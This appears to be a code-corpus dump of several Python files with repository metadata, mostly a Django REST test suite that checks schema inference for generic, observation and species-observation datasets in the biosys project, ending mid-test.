0a85e108460545b246badaf1a46b4e18a4a85665 | 39 | py | Python | basic_types/__init__.py | Octavian-ai/synthetic-graph-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 16 | 2018-09-06T09:27:03.000Z | 2021-05-28T01:35:44.000Z | basic_types/__init__.py | Octavian-ai/generate-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 1 | 2021-02-10T00:02:43.000Z | 2021-02-10T00:02:43.000Z | basic_types/__init__.py | Octavian-ai/generate-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 7 | 2018-07-23T08:39:54.000Z | 2021-02-08T16:24:54.000Z | from .nano_type import NanoType, NanoID | 39 | 39 | 0.846154 | 6 | 39 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0aa66c017e50135145fb85893df0e757705b1dbd | 58 | py | Python | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | null | null | null | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 1 | 2022-03-20T11:08:45.000Z | 2022-03-20T11:08:45.000Z | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 6 | 2022-03-13T13:10:25.000Z | 2022-03-28T22:18:12.000Z | #in=-23801594708
#golden=-42
print(input_int() % 2345678)
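# Added note: the '#in'/'#golden' comments presumably drive the course's test
# harness ('#in' is fed to input_int(), '#golden' is the expected output).
# The golden value -42 matches C-style truncated modulo of
# -23801594708 % 2345678; Python's own floored modulo would yield 2345636.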
| 14.5 | 28 | 0.724138 | 8 | 58 | 5.125 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377358 | 0.086207 | 58 | 3 | 29 | 19.333333 | 0.396226 | 0.431034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0abad766ca7d6167e7a9cfb991c13b3c1c24d798 | 72 | py | Python | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | from . import actions
from . import aescypher
from . import keygenerator | 24 | 26 | 0.805556 | 9 | 72 | 6.444444 | 0.555556 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 3 | 26 | 24 | 0.95082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ac1230b9c716e556f67b6ecfee406f1fc10d82a | 101 | py | Python | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | null | null | null | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | 9 | 2020-03-24T16:20:31.000Z | 2022-03-11T23:32:38.000Z | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | null | null | null | from django.shortcuts import render
def index(request):
return render(request, 'wow/wow.html')
| 16.833333 | 42 | 0.742574 | 14 | 101 | 5.357143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148515 | 101 | 5 | 43 | 20.2 | 0.872093 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
0ac30575054767f1ee2c1dea7fe3d5eb8a972fc8 | 35,542 | py | Python | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 2 | 2018-04-09T04:02:30.000Z | 2019-08-20T03:12:55.000Z | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 29 | 2016-01-20T08:14:15.000Z | 2017-07-13T07:17:32.000Z | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 5 | 2016-01-14T23:02:36.000Z | 2016-09-21T05:35:03.000Z | import datetime as dt
from os import path
import json
from datapackage import Package
from django.core.exceptions import ValidationError
from django.shortcuts import reverse
from django.utils import six
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIRequestFactory, force_authenticate
from main import utils_data_package
from main.models import Dataset
from main.tests.api import helpers
from main.utils_data_package import BiosysSchema
from main.api.views import InferDatasetView
class InferTestBase(helpers.BaseUserTestCase):
def verify_biosys_dataset(self, data_package, dataset_type):
"""
        Verify that the dataset model validation is error-free
:param data_package:
:param dataset_type:
:return:
"""
try:
Dataset.validate_data_package(data_package, dataset_type)
except ValidationError as e:
self.fail('Dataset validation error: {}'.format(e))
def verify_inferred_data(self, received):
"""
        Test that the data returned by the infer endpoint is valid and can be used to create a dataset through the API
        :param received: should be of the form
{
'name': 'dataset name'
'type': 'generic'|'observation'|'species_observation'
'data_package': {
# a valid data package with schema
}
}
"""
self.assertIn('name', received)
# self.assertIsNotNone(received.get('name'))
self.assertIn('type', received)
self.assertIn(received.get('type'), ['generic', 'observation', 'species_observation'])
# dataset
self.verify_biosys_dataset(received.get('data_package'), received.get('type'))
# Verify that we can create a dataset from the inference result.
url = reverse('api:dataset-list')
client = self.data_engineer_1_client
project = self.project_1
payload = {
'project': project.pk,
'name': received.get('name'),
'type': received.get('type'),
'data_package': received.get('data_package')
}
resp = client.post(url, payload, format='json')
self.assertIn(resp.status_code, [status.HTTP_200_OK, status.HTTP_201_CREATED])
class TestGenericSchema(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_generic_string_and_number_simple_xls(self):
"""
        Test that the inference detects number and integer types
"""
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', 56, 80.5, 'a comment'],
['Hilda', 24, 56, '']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
received = resp.json()
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_generic_string_and_number_simple_csv(self):
"""
        Test that the inference detects number and integer types
"""
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', '56', '80.5', 'a comment'],
['Hilda', '24', '56', '']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_csv_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
received = resp.json()
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_generic_date_iso_xls(self):
"""
Scenario: date column with ISO string 'yyyy-mm-dd'
        Given that a column is provided with strings of the form 'yyyy-mm-dd'
Then the column type should be 'date'
And the format should be 'any'
"""
columns = ['What', 'When']
rows = [
columns,
['Something', '2018-01-19'],
['Another thing', dt.date(2017, 12, 29).isoformat()],
['Another thing', '2017-08-01']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
field = schema.get_field_by_name('What')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('When')
self.assertEqual(field.type, 'date')
self.assertFalse(field.required)
self.assertEqual(field.format, 'any')
def test_mix_types_infer_most_plausible(self):
"""
        Scenario: a column with more integers than strings should be inferred as type='integer'
        Given that a column contains 2 strings and 5 integers
Then the column type should be 'integer'
"""
columns = ['How Many']
rows = [
columns,
[1],
['1 or 2'],
['3 or 4'],
[2],
[3],
[4],
[5]
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
field = schema.get_field_by_name('How Many')
self.assertEqual(field.type, 'integer')
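        # (Added note: with five integer rows against two non-numeric strings
        #  above, the inference presumably keeps the majority castable type,
        #  hence 'integer'.)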
def test_csv_with_excel_content_type(self):
"""
        On Windows a csv file often comes with an Excel content-type (e.g. 'application/vnd.ms-excel').
        Test that we handle this case.
"""
view = InferDatasetView.as_view()
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', '56', '80.5', 'a comment'],
['Hilda', '24', '56', '']
]
file_ = helpers.rows_to_csv_file(rows)
factory = APIRequestFactory()
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
# In order to hack the Content-Type of the multipart form data we need to use the APIRequestFactory and work
# with the view directly. Can't use the classic API client.
# hack the content-type of the request.
data, content_type = factory._encode_data(payload, format='multipart')
if six.PY3:
data = data.decode('utf-8')
data = data.replace('Content-Type: text/csv', 'Content-Type: application/vnd.ms-excel')
if six.PY3:
data = data.encode('utf-8')
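            # (added note: on Python 3 the encoded multipart payload is bytes,
            #  so it is decoded for the str replace above and re-encoded here;
            #  on Python 2 the replace operates on the str payload directly)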
request = factory.generic('POST', self.url, data, content_type=content_type)
user = self.data_engineer_1_user
token, _ = Token.objects.get_or_create(user=user)
force_authenticate(request, user=self.data_engineer_1_user, token=token)
resp = view(request).render()
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
if six.PY3:
content = resp.content.decode('utf-8')
else:
content = resp.content
received = json.loads(content)
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_infer_dataset_param(self):
"""
        Test that when the param infer_dataset_type is set to False the returned type is generic even if the
        data would otherwise infer a valid observation type
"""
columns = ['What', 'Latitude', 'Longitude']
rows = [
columns,
['Observation1', -32.0, 117.75],
['Observation with lat/long as string', '-32.0', '115.75']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
# no param: should infer the type
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# with param: return generic.
fp.seek(0)
payload = {
'file': fp,
'infer_dataset_type': False
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
self.assertEqual(Dataset.TYPE_GENERIC, received.get('type'))
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
lon_field = schema.get_field_by_name('Longitude')
# no required constraints
self.assertFalse(lat_field.required)
self.assertFalse(lon_field.required)
class TestObservationSchema(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_observation_with_lat_long_xls(self):
"""
        Scenario: File with columns Latitude and Longitude
        Given that columns named Latitude and Longitude exist
Then they should be of type 'number'
And they should be set as required
And they should be tagged with the appropriate biosys tag
And the dataset type should be observation
"""
columns = ['What', 'Latitude', 'Longitude']
rows = [
columns,
['Observation1', -32, 117.75],
['Observation with lat/long as string', '-32', '115.75']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
lon_field = schema.get_field_by_name('Longitude')
self.assertEqual(lat_field.type, 'number')
self.assertEqual(lon_field.type, 'number')
self.assertTrue(lat_field.required)
self.assertTrue(lon_field.required)
# biosys types
self.assertTrue(BiosysSchema(lat_field.get(BiosysSchema.BIOSYS_KEY_NAME)).is_latitude())
self.assertTrue(BiosysSchema(lon_field.get(BiosysSchema.BIOSYS_KEY_NAME)).is_longitude())
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# test biosys validity
self.verify_inferred_data(received)
def test_observation_with_lat_long_datum_xls(self):
"""
        Scenario: File with columns Latitude, Longitude and Datum
        Given that columns named Latitude, Longitude and Datum exist
        Then the dataset type should be inferred as Observation
        And latitude should be of type 'number', set as required and tagged with biosys type latitude
        And longitude should be of type 'number', set as required and tagged with biosys type longitude
        And datum should be of type 'string', set as not required and tagged with biosys type datum
"""
columns = ['What', 'Latitude', 'Longitude', 'Datum']
rows = [
columns,
['Observation1', -32, 117.75, 'WGS84'],
['Observation with lat/long as string', '-32', '115.75', None]
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# type observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
self.assertEqual(lat_field.type, 'number')
self.assertTrue(lat_field.required)
biosys = lat_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.LATITUDE_TYPE_NAME)
lon_field = schema.get_field_by_name('Longitude')
self.assertEqual(lon_field.type, 'number')
self.assertTrue(lon_field.required)
biosys = lon_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.LONGITUDE_TYPE_NAME)
# datum
datum_field = schema.get_field_by_name('Datum')
self.assertEqual(datum_field.type, 'string')
self.assertFalse(datum_field.required)
biosys = datum_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.DATUM_TYPE_NAME)
# test that we can save the dataset back.
self.verify_inferred_data(received)
def test_observation_with_easting_northing_datum_xls(self):
"""
        Scenario: File with columns Easting, Northing and Datum
        Given that columns named Easting, Northing and Datum exist
Then the dataset type should be inferred as Observation
And the type of Easting and Northing should be 'number'
And Easting and Northing should be set as required
And they should be tagged with the appropriate biosys tag
And Datum should be of type string and required.
"""
columns = ['What', 'Easting', 'Northing', 'Datum', 'Comments']
rows = [
columns,
            ['Something', 12563.233, 568932.345, 'WGS84', 'A dog'],
            ['Observation with easting/northing as string', '12563.233', '568932.345', 'WGS84', 'A dog']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be an observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
east_field = schema.get_field_by_name('Easting')
self.assertIsNotNone(east_field)
self.assertEqual(east_field.type, 'number')
self.assertTrue(east_field.required)
biosys = east_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.EASTING_TYPE_NAME)
north_field = schema.get_field_by_name('Northing')
self.assertIsNotNone(north_field)
self.assertEqual(north_field.type, 'number')
self.assertTrue(north_field.required)
biosys = north_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.NORTHING_TYPE_NAME)
datum_field = schema.get_field_by_name('Datum')
self.assertIsNotNone(datum_field)
self.assertEqual(datum_field.type, 'string')
self.assertTrue(datum_field.required)
biosys = datum_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.DATUM_TYPE_NAME)
# test that we can save the dataset as returned
self.verify_inferred_data(received)
def test_observation_with_easting_northing_zone_xls(self):
"""
        Scenario: File with columns Easting, Northing and Zone
        Given that columns named Easting, Northing and Zone exist
Then the dataset type should be inferred as Observation
And the type of Easting and Northing should be 'number'
And Easting and Northing should be set as required
And they should be tagged with the appropriate biosys tag
And Zone should be of type integer and required.
"""
columns = ['What', 'Easting', 'Northing', 'Zone', 'Comments']
rows = [
columns,
['Something', 12563.233, 568932.345, 50, 'A dog'],
['Observation with easting/northing as string', '12563.233', '568932.345', 50, 'A dog']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be an observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
east_field = schema.get_field_by_name('Easting')
self.assertIsNotNone(east_field)
self.assertEqual(east_field.type, 'number')
self.assertTrue(east_field.required)
biosys = east_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.EASTING_TYPE_NAME)
north_field = schema.get_field_by_name('Northing')
self.assertIsNotNone(north_field)
self.assertEqual(north_field.type, 'number')
self.assertTrue(north_field.required)
biosys = north_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.NORTHING_TYPE_NAME)
zone_field = schema.get_field_by_name('Zone')
self.assertIsNotNone(zone_field)
self.assertEqual(zone_field.type, 'integer')
self.assertTrue(zone_field.required)
biosys = zone_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.ZONE_TYPE_NAME)
# test that we can save the dataset as returned
self.verify_inferred_data(received)
class TestSpeciesObservation(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_observation_with_species_name_only_xls(self):
"""
        Scenario: File with columns Latitude, Longitude and Species Name should be inferred as species observation
        Given that columns named Latitude, Longitude and Species Name exist
Then the dataset type should be of type speciesObservation
And the column 'Species Name' should be of type string
And the column 'Species Name' should be set as 'required'
And they should be tagged with the speciesName biosys tag.
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Species Name', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis lupus', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby bat', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
species_name_field = schema.get_field_by_name('Species Name')
# field attributes
self.assertIsNotNone(species_name_field)
self.assertEqual(species_name_field.type, 'string')
self.assertTrue(species_name_field.required)
# biosys type
biosys = species_name_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_NAME_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
def test_observation_with_genus_and_species_only_xls(self):
"""
        Scenario: File with columns Latitude, Longitude, Genus and Species should be inferred as species observation
        Given that columns named Latitude, Longitude, Genus and Species exist
        Then the dataset type should be of type speciesObservation
        And the column 'Genus' should be of type string, set as required and tagged as biosys type genus
        And the column 'Species' should be of type string, set as required and tagged as biosys type species
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Genus', 'Species', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis', 'lupus', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby', 'bat', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
# field attributes
# genus
genus = schema.get_field_by_name('Genus')
self.assertIsNotNone(genus)
self.assertEqual(genus.type, 'string')
self.assertTrue(genus.required)
biosys = genus.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.GENUS_TYPE_NAME)
species = schema.get_field_by_name('Species')
self.assertIsNotNone(species)
self.assertEqual(species.type, 'string')
self.assertTrue(species.required)
biosys = species.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
def test_observation_with_genus_species_infra_rank_and_infra_name_only_xls(self):
"""
        Scenario: File with columns Latitude, Longitude, Genus, Species, Infraspecific Rank and Infraspecific Name
        should be inferred as species observation
        Given that columns named Latitude, Longitude, Genus, Species, Infraspecific Rank and Infraspecific Name exist
        Then the dataset type should be of type speciesObservation
        And the column 'Genus' should be of type string, set as required and tagged as biosys type genus
        And the column 'Species' should be of type string, set as required and tagged as biosys type species
        And the column 'Infraspecific Rank' should be of type string, set as not required and tagged as biosys type InfraSpecificRank
        And the column 'Infraspecific Name' should be of type string, set as not required and tagged as biosys type InfraSpecificName
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Genus', 'Species', 'Infraspecific Rank',
'Infraspecific Name', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis', 'lupus', 'subsp. familiaris', '', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby', 'bat', '', '', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None, None, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
# field attributes
# genus
genus = schema.get_field_by_name('Genus')
self.assertIsNotNone(genus)
self.assertEqual(genus.type, 'string')
self.assertTrue(genus.required)
biosys = genus.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.GENUS_TYPE_NAME)
# species
species = schema.get_field_by_name('Species')
self.assertIsNotNone(species)
self.assertEqual(species.type, 'string')
self.assertTrue(species.required)
biosys = species.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_TYPE_NAME)
# infra rank
infra_rank = schema.get_field_by_name('Infraspecific Rank')
self.assertIsNotNone(infra_rank)
self.assertEqual(infra_rank.type, 'string')
self.assertFalse(infra_rank.required)
biosys = infra_rank.get('biosys')
